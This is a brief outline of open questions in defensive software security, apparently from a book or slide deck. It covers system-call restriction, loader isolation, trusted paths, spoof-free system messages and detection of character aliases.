• How to restrict system call access?
• How to prevent arbitrary initial authority?
• Software architectures to achieve loader isolation?
• Language features for secure software?
• Damage control features in operating systems, languages and applications
Page 54: Signs and Minds
• How to avoid confusion about identity?
• How to represent system messages reliably and without a chance for fake messages?
• Software technology to establish a trusted path for users?
• Character sets and their representation as fonts?
• Reliable detection of character aliases?